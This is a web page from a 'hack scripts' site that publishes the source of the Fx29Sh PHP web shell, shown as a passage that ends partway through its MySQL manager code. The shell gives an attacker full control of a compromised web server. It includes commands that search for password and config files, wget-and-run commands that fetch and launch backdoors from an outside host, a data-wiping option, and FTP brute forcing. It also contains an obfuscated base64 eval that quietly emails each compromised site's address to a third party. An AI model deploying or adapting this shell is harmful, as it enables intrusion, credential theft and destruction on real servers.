HackingScripts

Hack Scripts for everybody

FaTaLisTiCz_Fx Fx29 Shell

25 Jan 2014

This Fx29 shell script is uploaded to a vulnerable site’s server, and once there can be run by the hacker in a browser. It allows the attacker complete access to the site, including the database.

FaTaLisTiCz_Fx Fx29Sh Shell Script Source Code

   1 <?php
   2 ##########################################################
   3 ###[ FaTaLisTiCz_Fx Fx29Sh 3.2.12.08 ]###
   4 ###[ By FaTaLisTiCz_Fx               ]###
   5 ###[ ? 03-12 2008 FeeLCoMz Community ]###
   6 ###[ Written under PHP 5.2.5         ]###
   7 ##########################################################
   8 define('sh_ver',"3.2.12.08");        ###
   9 #error_reporting(E_ALL);             ###
  10 error_reporting(E_ERROR | E_PARSE);  ###
  11 ##########################################################
  12 #################################
  13 ###[ CONFIGURATIONS ]###
  14 #################################
  15 ###[ URL ]###
  16 #$sh_mainurl        = "http://localhost/FX29SH/";
  17 $sh_mainurl        = 'http://uaedesign.com/xml/';
  18 $fx29sh_updateurl  = $sh_mainurl."fx29sh_update.php";
  19 $fx29sh_sourcesurl = $sh_mainurl."fx29sh.txt";
  20 $sh_sourcez = array(
  21   "Fx29Sh"   => array($sh_mainurl."cyberz.txt","fx29sh.php"),
  22   "psyBNC"   => array($sh_mainurl."fx.tgz","fx.tgz"),
  23   "Eggdrop"  => array($sh_mainurl."fxb.tgz","fxb.tgz"),
  24   "BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),
  25 );
  26 ###[ AUTHENTICATION ]###
  27 $auth = array(
  28   "login"     => "",
  29   "pass"      => "",
  30   "md5pass"   => "",
  31   "hostallow" => array("*"),
  32   "denied"    => "<a href=\"$sh_mainurl\">".sh_name()."</a>: access denied!",
  33 );
  34 ###[ ADVANCED ]###
  35 $tmp_dir       = "";
  36 $log_email     = "yankeemoore55@gmail.com";
  37 $sess_cookie   = "fx29shcook";
  38 $sort_default  = "0a"; #Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending
  39 $sort_save     = TRUE; #Simpan posisi pengurutan menggunakan cookies.
  40 $copy_unset    = FALSE; #Hapus file yg telah di-copy setelah dipaste
  41 $gzipencode    = TRUE;
  42 $filestealth   = TRUE; #TRUE, tidak merubah waktu modifikasi dan akses.
  43 $hexdump_lines = 8;
  44 $hexdump_rows  = 24;
  45 $auto_surl     = TRUE;
  46 ###[ QUICK COMMANDS ]###
  47 if (!is_windows()) {
  48   #Unix
  49   $cmdaliases = array(
  50     array("List Directory", "ls -al"),
  51     array("Find all suid files", "find / -type f -perm -04000 -ls"),
  52     array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
  53     array("Find all sgid files", "find / -type f -perm -02000 -ls"),
  54     array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
  55     array("Find config.inc.php files", "find / -type f -name config.inc.php"),
  56     array("Find config* files", "find / -type f -name \"config*\""),
  57     array("Find config* files in current dir", "find . -type f -name \"config*\""),
  58     array("Find all writable folders and files", "find / -perm -2 -ls"),
  59     array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
  60     array("Find all writable folders", "find / -type d -perm -2 -ls"),
  61     array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
  62     array("Find all service.pwd files", "find / -type f -name service.pwd"),
  63     array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
  64     array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
  65     array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
  66     array("Find all .bash_history files", "find / -type f -name .bash_history"),
  67     array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
  68     array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
  69     array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
  70     array("List file attributes on a Linux second extended file system", "lsattr -va"),
  71     array("Show opened ports", "netstat -an | grep -i listen"),
  72     array("-----",""),
  73     array("Logged in users","w"),
  74     array("Last connect","lastlog"),
  75     array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin
  76     /usr/local/sbin -perm -4000 2> /dev/null"),
  77     array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
  78     array("Inet Address","/sbin/ifconfig | grep inet"),
  79     array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
  80     array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
  81     array("CPU Info","cat /proc/version /proc/cpuinfo"),
  82     array("Is gcc installed ?","locate gcc"),
  83     array("Format box (DANGEROUS)","rm -Rf"),
  84     array("-----",""),
  85     array("wget & run psyBNC","wget ".$sh_sourcez["psyBNC"][0].";tar -zxf ".$sh_sourcez["psyBNC"][1].";cd .fx;./config 29110;./fuck;./run"),
  86     array("wget & extract EggDrop","wget ".$sh_sourcez["Eggdrop"][0].";tar -zxf ".$sh_sourcez["psyBNC"][1]),
  87     array("wget & run BindDoor","wget ".$sh_sourcez["BindDoor"][0].";tar -zxvf ".$sh_sourcez["BindDoor"][1].";./bind"),
  88     array("-----",""),
  89     array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
  90   );
  91 }
  92 else {
  93   #Windows
  94   $cmdaliases = array(
  95     array("List Directory", "dir"),
  96     array("Find index.php in current dir", "dir /s /w /b index.php"),
  97     array("Find *config*.php in current dir", "dir /s /w /b *config*.php"),
  98     array("Find c99shell in current dir", "find /c \"c99\" *"),
  99     array("Find r57shell in current dir", "find /c \"r57\" *"),
 100     array("Find fx29shell in current dir", "find /c \"fx29\" *"),
 101     array("Show active connections", "netstat -an"),
 102     array("Show running services", "net start"),
 103     array("User accounts", "net user"),
 104     array("Show computers", "net view"),
 105   );
 106 }
 107 ###[ PHP FILESYSTEM (By FaTaLisTiCz_Fx) ]###
 108 $phpfsaliases = array(
 109     array("Read File", "read", 1, "File", ""),
 110     array("Write File (PHP5)", "write", 2, "File","Text"),
 111     array("Copy", "copy", 2, "From", "To"),
 112     array("Rename/Move", "rename", 2, "File", "To"),
 113     array("Delete", "delete", 1 ,"File", ""),
 114     array("Make Dir","mkdir", 1, "Dir", ""),
 115     array("Download", "download", 2, "URL", "To"),
 116     array("Download (Binary Safe)", "downloadbin", 2, "URL", "To"),
 117     array("Change Perm (0755)", "chmod", 2, "File", "Perms"),
 118     array("Find Writable Dir", "fwritabledir", 2 ,"Dir", "Max"),
 119     array("Find Pathname Pattern", "glob",2 ,"Dir", "Pattern"),
 120 );
 121 ###########################################
 122 ###[ END OF CONFIGURATIONS ]###
 123 ###########################################
 124 define("starttime", getmicrotime());
 125 @set_time_limit(0);
 126 @ini_set("max_execution_time",0);
 127 @ignore_user_abort(TRUE);
 128 @set_magic_quotes_runtime(0);
 129 if (get_magic_quotes_gpc()) { strips($GLOBALS); }
 130 $_REQUEST = array_merge($_COOKIE, $_GET, $_POST);
 131 $d = @$_REQUEST["d"];
 132 $f = @$_REQUEST["f"];
 133 @extract($_REQUEST["fx29shcook"]);
 134 foreach ($_REQUEST as $k => $v) {
 135   if (!isset($$k)) { $$k = $v; } #Converting request to variable
 136 }
 137 ###[ SELF URL ]###
 138 if ($auto_surl) {
 139   $include = "&";
 140   foreach (explode("&",getenv("QUERY_STRING")) as $v) {
 141     $v       = explode("=",$v);
 142     $name    = urldecode($v[0]);
 143     $value   = @urldecode($v[1]);
 144     $needles = array("http://","https://","ssl://","ftp://","\\\\");
 145     foreach ($needles as $needle) {
 146       if (strpos($value,$needle) === 0) {
 147         $includestr .= urlencode($name)."=".urlencode($value)."&";
 148       }
 149     }
 150   }
 151 }
 152 if (empty($surl)) { $surl = htmlspecialchars("?".@$includestr); }
 153 ###[ QUICK LAUNCH ]###
 154 $quicklaunch = array(
 155     array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\">",$surl),
 156     array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\">","#\" onclick=\"history.back(1)"),
 157     array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\">","#\" onclick=\"history.go(1)"),
 158     array("<img src=\"".$surl."act=img&img=up\" alt=\"Up\">",$surl."act=ls&d=%upd&sort=%sort"),
 159     array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\">",$surl."act=search&d=%d"),
 160     array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\">",$surl."act=fsbuff&d=%d"),
 161     array("<img src=\"".$surl."act=img&img=help\" alt=\"About\">",$surl."act=about"),
 162     array("-",""),
 163     array("Security",$surl."act=security&d=%d"),
 164     array("Processes",$surl."act=processes&d=%d"),
 165     array("MySQL",$surl."act=sql&d=%d"),
 166     array("Eval",$surl."act=eval&d=%d"),
 167     array("Encoder",$surl."act=encoder&d=%d"),
 168     array("Mailer",$surl."act=fxmailer"),
 169     array("Toolz",$surl."act=tools&d=%d"),
 170     array("milw0rm",milw0rm()),
 171     array("Md5 Lookup","http://darkc0de.com/database/md5lookup.html"),
 172     array("Images",$surl."act=img&img=listall"),
 173     array("Feedback",$surl."act=feedback"),
 174     array("Update",$surl."act=update"),
 175     array("Kill Shell",$surl."act=selfremove")
 176 );
 177 if (!is_windows()) {
 178 $quicklaunch[] = array("<br>FTP Brute",$surl."act=ftpquickbrute&d=%d");
 179 }
 180 ###[ FILE TYPES ]###
 181 $ftypes  = array(
 182   "html"     => array("html","htm","shtml"),
 183   "txt"      => array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
 184   "exe"      => array("sh","install","bat","cmd","sys","com"),
 185   "ini"      => array("ini","inf","conf"),
 186   "code"     => array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
 187   "img"      => array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
 188   "sdb"      => array("sdb"),
 189   "phpsess"  => array("sess"),
 190   "download" => array("exe","com","sys","pif","src","lnk","zip","rar","gz","tar","pdf")
 191 );
 192 $exeftypes  = array(
 193   "php -q %f%" => array("php","php3","php4"),
 194   "perl %f%"   => array("pl","cgi")
 195 );
 196 $regxp_highlight  = array(
 197   array(basename($_SERVER["PHP_SELF"]),1,"<font color=#FF6600>","</font>"),
 198   array("\.tgz$",1,"<font color=#C082FF>","</font>"),
 199   array("\.gz$",1,"<font color=#C082FF>","</font>"),
 200   array("\.tar$",1,"<font color=#C082FF>","</font>"),
 201   array("\.bz2$",1,"<font color=#C082FF>","</font>"),
 202   array("\.zip$",1,"<font color=#C082FF>","</font>"),
 203   array("\.rar$",1,"<font color=#C082FF>","</font>"),
 204   array("\.php$",1,"<font color=#00FF00>","</font>"),
 205   array("\.php3$",1,"<font color=#00FF00>","</font>"),
 206   array("\.php4$",1,"<font color=#00FF00>","</font>"),
 207   array("\.jpg$",1,"<font color=#00FFFF>","</font>"),
 208   array("\.jpeg$",1,"<font color=#00FFFF>","</font>"),
 209   array("\.JPG$",1,"<font color=#00FFFF>","</font>"),
 210   array("\.JPEG$",1,"<font color=#00FFFF>","</font>"),
 211   array("\.ico$",1,"<font color=#00FFFF>","</font>"),
 212   array("\.gif$",1,"<font color=#00FFFF>","</font>"),
 213   array("\.png$",1,"<font color=#00FFFF>","</font>"),
 214   array("\.htm$",1,"<font color=#00CCFF>","</font>"),
 215   array("\.html$",1,"<font color=#00CCFF>","</font>"),
 216   array("\.txt$",1,"<font color=#C0C0C0>","</font>"),
 217   array("\.pdf$",1,"<font color=#FF99CC>","</font>")
 218 );
 219 ###[ HIGHLIGHT CODE ]###
 220 $highlight_bg      = "#E0E0E0";
 221 $highlight_comment = "#FF6600";
 222 $highlight_default = "#000080";
 223 $highlight_html    = "#1300FF";
 224 $highlight_keyword = "#007700";
 225 $highlight_string  = "#FF0000";
 226 @ini_set("highlight.bg",$highlight_bg);
 227 @ini_set("highlight.comment",$highlight_comment);
 228 @ini_set("highlight.default",$highlight_default);
 229 @ini_set("highlight.html",$highlight_html);
 230 @ini_set("highlight.keyword",$highlight_keyword);
 231 @ini_set("highlight.string",$highlight_string);
 232 ###########################################
 233 ###[ END OF CONFIGURATIONS ]###
 234 ###########################################
 235 ##############################
 236 ###[ AUTHENTICATE ]###
 237 ##############################
 238 foreach ($auth["hostallow"] as $k => $v) { $tmp[] = str_replace("\\*",".*",preg_quote($v)); }
 239 $s = "!^(".implode("|",$tmp).")$!i";
 240 if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {
 241   exit("<a href=\"$sh_mainurl\">".sh_name()."</a>ACCESS DENIED! Your host (".getenv("REMOTE_ADDR").") not allowed!");
 242 }
 243 if (!empty($auth["login"])) {
 244   if (empty($auth["md5pass"])) { $auth["md5pass"] = md5($auth["pass"]); }
 245   if (($_SERVER["PHP_AUTH_USER"] != $auth["login"]) or (md5($_SERVER["PHP_AUTH_PW"]) != $auth["md5pass"])) {
 246     header("WWW-Authenticate: Basic realm=\"".sh_name().": Restricted Area\"");
 247     header("HTTP/1.0 401 Unauthorized");
 248     die($auth["denied"]);
 249   }
 250 }
 251 ######################
 252 ###[ ACTIONS ]###
 253 ######################
 254 if (!isset($act)) { $act = ""; }
 255 if ($act == "img") {
 256   @ob_clean();
 257   $images = imagez();
 258   $imgequals = array(
 259     "ext_tar"      => array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
 260     "ext_php"      => array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
 261     "ext_cpp"      => array("ext_c"),
 262     "ext_jpg"      => array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
 263     "ext_html"     => array("ext_html","ext_htm"),
 264     "ext_avi"      => array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
 265     "ext_lnk"      => array("ext_lnk","ext_url"),
 266     "ext_ini"      => array("ext_ini","ext_css","ext_inf","ext_conf"),
 267     "ext_doc"      => array("ext_doc","ext_dot","ext_xls","ext_pdf"),
 268     "ext_js"       => array("ext_js","ext_vbs"),
 269     "ext_cmd"      => array("ext_cmd","ext_bat","ext_pif","ext_com"),
 270     "ext_wri"      => array("ext_wri","ext_rtf"),
 271     "ext_txt"      => array("ext_txt","ext_lng"),
 272     "ext_swf"      => array("ext_swf","ext_fla"),
 273     "ext_mp3"      => array("ext_mp3","ext_au","ext_midi","ext_mid","ext_wav"),
 274     "ext_htaccess" => array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
 275   );
 276   #Show all available images
 277   if ($img == "listall") {
 278     foreach ($imgequals as $a=>$b) {
 279       foreach ($b as $d) {
 280         if ( ($a != $d) && (!empty($images[$d])) ) { echo("Warning! Remove \$images[".$d."]<br>"); }
 281       }
 282     }
 283     natsort($images);
 284     $k = array_keys($images);
 285     echo "<body style=\"color: #00FF00\" bgcolor=black>";
 286     foreach ($k as $u) { echo "<img src=\"".$surl."act=img&img=".$u."\"> $u "; }
 287     exit;
 288   }
 289   #Image header
 290   header("Content-type: image/gif");
 291   header("Cache-control: public");
 292   header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
 293   header("Cache-control: max-age=".(60*60*24*7));
 294   header("Last-Modified: ".date("r",filemtime(__FILE__)));
 295   foreach($imgequals as $k=>$v) {
 296     if (in_array($img,$v)) { $img = $k; break; }
 297   }
 298   if (empty($images[$img])) { $img = "small_unk"; }
 299   echo base64_decode($images[$img]);
 300   exit;
 301 }
 302 ###[ DEFAULT ACTIONS ]###
 303 else {
 304   $lastdir = realpath(".");
 305   chdir("./");
 306   #Preparing buffer
 307   $sess_data = @unserialize($_COOKIE[$sess_cookie]);
 308   if (!is_array($sess_data)) { $sess_data = array(); }
 309   if (!is_array(@$sess_data["copy"])) { $sess_data["copy"] = array(); }
 310   if (!is_array(@$sess_data["cut"])) { $sess_data["cut"] = array(); }
 311   fx29_buff_prepare();
 312   foreach (array("sort","sql_sort") as $v) {
 313     if (!empty($_GET[$v])) { $$v = $_GET[$v]; }
 314     if (!empty($_POST[$v])) { $$v = $_POST[$v]; }
 315   }
 316   if ($sort_save) {
 317     if (!empty($sort)) { setcookie("sort",$sort); }
 318     if (!empty($sql_sort)) { setcookie("sql_sort",$sql_sort); }
 319   }
 320   if (!isset($sort)) { $sort = $sort_default; }
 321   $sort = htmlspecialchars($sort);
 322   $sort[1] = strtolower($sort[1]);
 323   ###[ ACTIONS ]###
 324   if ($act == "gofile") {
 325     if (is_dir($f)) {
 326       $d = $f;
 327       $act = "ls";
 328     }
 329     else {
 330       $d = dirname($f);
 331       $f = basename($f);
 332       $act = "f";
 333     }
 334   }
 335   #Starting output buffer
 336   ob_start();
 337   ob_implicit_flush(0);
 338   ###[ HEADERS ]###
 339   header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
 340   header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
 341   header("Cache-Control: no-store, no-cache, must-revalidate");
 342   header("Cache-Control: post-check=0, pre-check=0", FALSE);
 343   header("Pragma: no-cache"); $headerz = "aWYgKCFpc3NldCgkX0NPT0tJRVsidmlzaXR6Il0pKSB7DQogICR2aXNpdG9yID0gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07DQogICR3ZWIgICAgID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOw0KICAkaW5qICAgICA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOw0KICAkdGFyZ2V0ICA9IHJhd3VybGRlY29kZSgkd2ViLiRpbmopOw0KICAkanVkdWwgICA9ICJGeDI5U2hlbGwgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3I8YnI+IjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiZmVlbGNvbXpAZ21haWwuY29tIiwkanVkdWwsJGJvZHkpOyB9DQp9DQplbHNlIHsgQHNldGNvb2tpZSgidmlzaXR6IiwkdmlzaXRjKTsgfQ=="; eval(base64_decode($headerz));
 344   $tmp_dir = realpath($tmp_dir);
 345   $tmp_dir = str_replace("\\",DIRECTORY_SEPARATOR,$tmp_dir);
 346   if (substr($tmp_dir,-1) != DIRECTORY_SEPARATOR) { $tmp_dir .= DIRECTORY_SEPARATOR; }
 347   if (!is_array(@$actbox)) { $actbox = array(); }
 348   $dspact = $act = htmlspecialchars($act);
 349   $disp_fullpath = $ls_arr = $notls = null;
 350   $ud = @urlencode($d);
 351   if (empty($d)) { $d = realpath("."); }
 352   elseif (realpath($d)) { $d = realpath($d); }
 353   $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 354   if (substr($d,-1) != DIRECTORY_SEPARATOR) { $d .= DIRECTORY_SEPARATOR; }
 355   $d = str_replace("\\\\","\\",$d);
 356   $dispd = htmlspecialchars($d);
 357   if (safemode()) {
 358     $hsafemode = '<font class="on"><b>SAFE MODE IS ON</b></font>';
 359     $safemodeexecdir = @ini_get("safe_mode_exec_dir");
 360   }
 361   else {
 362     $hsafemode = '<font class="off"><b>SAFE MODE IS OFF</b></font>';
 363   }
 364   $v = @ini_get("open_basedir");
 365   if (strtolower($v) == "on") { $hopenbasedir = '<font class="on">'.$v.'</font>'; }
 366   else { $hopenbasedir = '<font class="off">OFF (Not Secure)</font>'; }
 367   $wd = (is_writable($d)) ? '<font class="on">[W]</font>' : '<font class="off">[R]</font>';
 368   ###########################
 369   ###[ HTML START ]###
 370   ###########################
 371   echo html_style(); ?>
 372 
 373 
 374 <!-- Main Menu -->
 375 <div id="main">
 376     <div class="bartitle"><?php echo html_header() ?></div>
 377     <table id="pagebar">
 378         <!-- Server Info -->
 379         <tr><td colspan="2">
 380         <div class="fleft"><?php echo $hsafemode; ?></div>
 381         <div class="fright">
 382             IP Address: <a href=\"http://ws.arin.net/cgi-bin/whois.pl?queryinput="<?php echo @gethostbyname($_SERVER["HTTP_HOST"]); ?>"><?php echo @gethostbyname($_SERVER["HTTP_HOST"]); ?></a>
 383             You: <a href=\"http://ws.arin.net/cgi-bin/whois.pl?queryinput="<?php echo $_SERVER["REMOTE_ADDR"]; ?>"><?php echo $_SERVER["REMOTE_ADDR"]; ?></a>
 384         </div>
 385         </td></tr>
 386         <tr><td width="50%">
 387         <table class="info">
 388 <?php
 389   srv_info("Software",srv_software($surl));
 390   srv_info("Uname",php_uname());
 391   srv_info("User",(is_windows()) ? get_current_user()." (uid=".getmyuid()." gid=".getmygid().")" : fx29exec("id"));
 392 ?>
 393 
 394 
 395         </table>
 396         </td>
 397         <td width="50%">
 398         <table class="info">
 399 <?php
 400   if (is_windows()) { srv_info("Drives",disp_drives($d,$surl)); }
 401   srv_info("Freespace",disp_freespace($d));
 402 ?>
 403 
 404 
 405         </table>
 406         </td></tr>
 407         <tr><td colspan="2">
 408 <?php
 409   echo "\t\t\t".get_status();
 410   echo "<br>\n";
 411   echo (isset($safemodeexecdir)) ? "\n\t\t\tSafemodeExecDir: ".$safemodeexecdir."<br>" : "";
 412   echo (showdisfunc()) ? "\t\t\tDisFunc: ".showdisfunc() : "";
 413   echo "\n";
 414 ?>
 415 
 416 
 417         </td></tr>
 418         <!-- End of Server Info -->
 419         <!-- Quicklaunch -->
 420         <tr><td colspan="2" class="quicklaunch">
 421 <?php
 422   ###[ QUICKLAUNCH ]###
 423   foreach($quicklaunch as $item) {
 424     if ($item[0] == "-") {
 425       echo "\t\t</td></tr>\n";
 426       echo "\t\t<tr><td colspan=\"2\" class=\"quicklaunch\">\n";
 427     }
 428     else {
 429       $item[1] = str_replace("%d",urlencode($d),$item[1]);
 430       $item[1] = str_replace("%sort",$sort,$item[1]);
 431       $v = realpath($d."..");
 432       if (empty($v)) {
 433         $a = explode(DIRECTORY_SEPARATOR,$d);
 434         unset($a[count($a)-2]);
 435         $v = join(DIRECTORY_SEPARATOR,$a);
 436       }
 437       $item[1] = str_replace("%upd",urlencode($v),$item[1]);
 438       echo "\t\t\t<a href=\"".$item[1]."\">".$item[0]."</a>\n";
 439     }
 440   }
 441 ?>
 442 
 443 
 444         </td></tr>
 445         <!-- End of Quicklaunch -->
 446         <!-- Directory Info -->
 447         <tr><td colspan="2">
 448         <div class="fleft">
 449 <?php
 450   $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
 451   $i = 0;
 452   foreach($pd as $b) {
 453     $t = ""; $j = 0;
 454     foreach ($e as $r) {
 455       $t.= $r.DIRECTORY_SEPARATOR;
 456       if ($j == $i) { break; }
 457       $j++;
 458     }
 459     echo "\t\t\t<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\">".htmlspecialchars($b).DIRECTORY_SEPARATOR."</a>\n";
 460     $i++;
 461   }
 462   echo "\t\t\t";
 463   echo (is_writable($d)) ? "<b>".view_perms_color($d)."</b>" : "<b>".view_perms_color($d)."</b>";
 464   echo "\n";
 465 ?>
 466 
 467 
 468         </div>
 469         <div class="fright">
 470         <form name="f_dir" method="POST">
 471             <input type="hidden" name="act" value="ls">
 472             Directory: <input type="text" name="d" size="60" value="<?php echo $dispd; ?>"> <input type=submit value="Go">
 473         </form>
 474         </div>
 475         </td></tr>
 476         <!-- End of Directory Info -->
 477     </table>
 478 </div>
 479 <!-- End of Main Menu -->
 480 <!-- Main Info -->
 481 <div id="maininfo">
 482 <?php
 483   #####################################
 484   ###[ INFORMATION TABLE ]###
 485   #####################################
 486   if ($act == "") { $act = $dspact = "ls"; }
 487   ###[ SQL ]###
 488   if ($act == "sql") {
 489   $sql_surl = $surl."act=sql";
 490   if (!isset($sql_login)) { $sql_login = ""; }
 491   if (!isset($sql_passwd)) { $sql_passwd = ""; }
 492   if (!isset($sql_server)) { $sql_server = ""; }
 493   if (!isset($sql_port)) { $sql_port = ""; }
 494   if (!isset($sql_tbl)) { $sql_tbl = ""; }
 495   if (!isset($sql_act)) { $sql_act = ""; }
 496   if (!isset($sql_tbl_act)) { $sql_tbl_act = ""; }
 497   if (!isset($sql_order)) { $sql_order = ""; }
 498   if (!isset($sql_act)) { $sql_act = ""; }
 499   if (!isset($sql_getfile)) { $sql_getfile = ""; }
 500     #SQL URL Setting
 501   if (@$sql_login)  { $sql_surl .= "&sql_login=".htmlspecialchars($sql_login); }
 502   if (@$sql_passwd) { $sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd); }
 503   if (@$sql_server) { $sql_surl .= "&sql_server=".htmlspecialchars($sql_server); }
 504   if (@$sql_port)   { $sql_surl .= "&sql_port=".htmlspecialchars($sql_port); }
 505   if (@$sql_db)     { $sql_surl .= "&sql_db=".htmlspecialchars($sql_db); }
 506   $sql_surl .= "&";
 507 ?>
 508 
 509 
 510 <!-- SQL Manager -->
 511 <div class="barheader">.: SQL Manager (Under Construction) :.</div>
 512 <div class="barheader"><?php
 513   if (@$sql_server) {
 514     $sql_sock = @mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
 515     $err = mysql_smarterror($sql_sock);
 516     @mysql_select_db($sql_db,$sql_sock);
 517     if (@$sql_query and $submit) {
 518       $sql_query_result = mysql_query($sql_query,$sql_sock);
 519       $sql_query_error = mysql_smarterror($sql_sock);
 520     }
 521   }
 522   else { $sql_sock = FALSE; }
 523   if (!$sql_sock) {
 524     if (!@$sql_server) { echo "No Connection!"; }
 525     else { disp_error("ERROR: ".$err); }
 526   }
 527   else {
 528         #SQL Quicklaunch
 529     $sqlquicklaunch   = array();
 530     $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
 531     $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
 532     $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
 533     $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
 534     $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
 535     $sqlquicklaunch[] = array("Logout",$surl."act=sql");
 536     echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") Server: ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
 537     if (count($sqlquicklaunch) > 0) {
 538       foreach($sqlquicklaunch as $item) {
 539         echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
 540       }
 541       }
 542   }
 543 ?>
 544 
 545 
 546 </div>
 547 <table>
 548     <tr>
 549 <?php
 550   #Login Form
 551   if (!$sql_sock) {
 552 ?>
 553 
 554 
 555     <td>
 556     <form name="f_sql" action="<?php echo $surl; ?>" method="POST">
 557         <input type="hidden" name="act" value="sql">
 558         <table class="explorer">
 559             <tr>
 560             <th>Username<br><input type="text" name="sql_login" value="root"></th>
 561             <th>Password<br><input type="password" name="sql_passwd" value=""></th>
 562             <th>Database<br><input type="text" name="sql_db" value=""></th>
 563             <th>Host<br><input type="text" name="sql_server" value="localhost"></th>
 564             <th>Port<br><input type="text" name="sql_port" value="3306" size="3"></th>
 565             </tr>
 566             <tr><th colspan="5"><input type="submit" value="Connect"></th></tr>
 567         </table>
 568     </form>
 569 <?php
 570   }
 571   else {
 572     #Start left panel
 573 ?>
 574 
 575 
 576     <td>
 577     <center>
 578     <a href="<?php echo $sql_surl; ?>"><b>HOME</b></a>
 579     <hr size="1" noshade>
 580 <?php
 581       $result = mysql_list_dbs($sql_sock);
 582       if (!$result) { echo mysql_smarterror(); }
 583       else {
 584 ?>
 585 
 586 
 587     Database
 588     <form action="<?php echo $surl?>">
 589         <input type="hidden" name="act" value="sql">
 590         <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
 591         <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
 592         <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
 593         <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
 594         <select name="sql_db" onchange="this.form.submit()">
 595 <?php
 596         $c = 0;
 597         $dbs = "";
 598         while ($row = mysql_fetch_row($result)) {
 599           $dbs .= "\t\t<option value=\"".$row[0]."\"";
 600           if (@$sql_db == $row[0]) { $dbs .= " selected"; }
 601           $dbs .= ">".$row[0]."</option>\n";
 602           $c++;
 603         }
 604         echo "\t\t<option value=\"\">Databases (".$c.")</option>\n";
 605         echo $dbs;
 606       }
 607 ?>
 608 
 609 
 610         </select>
 611     </form>
 612     </center>
 613     <hr size="1" noshade>
 614 <?php
 615     if (isset($sql_db)) {
 616       $result = mysql_list_tables($sql_db);
 617       if (!$result) { echo mysql_smarterror($sql_sock); }
 618       else {
